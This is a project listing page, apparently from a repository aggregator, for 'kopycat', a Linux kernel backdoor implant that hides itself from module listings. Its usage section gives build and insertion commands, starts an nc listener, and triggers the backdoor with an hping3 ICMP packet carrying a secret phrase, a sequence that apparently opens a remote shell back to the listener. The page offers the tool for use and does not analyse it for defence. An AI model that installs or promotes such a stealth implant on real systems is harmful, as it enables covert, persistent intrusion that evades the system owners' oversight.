All Projects → milabs → kopycat

milabs / kopycat

Licence: other
Linux Kernel module-less implant (backdoor)

Programming Languages

c
50402 projects - #5 most used programming language
Makefile
30231 projects
Nix
1067 projects
shell
77523 projects

0

KOPYCAT - Linux Kernel module-less implant (backdoor)

Usage

$ make
$ sudo insmod kopycat.ko
insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device
$ lsmod | grep kopycat
$ cat /proc/modules | grep kopycat

Launch nc listener:

$ nc -l 6666

Trigger the backdoor by sending ICMP packet with secret phrase:

$ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1

Author

Ilya V. Matveychikov

2021

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].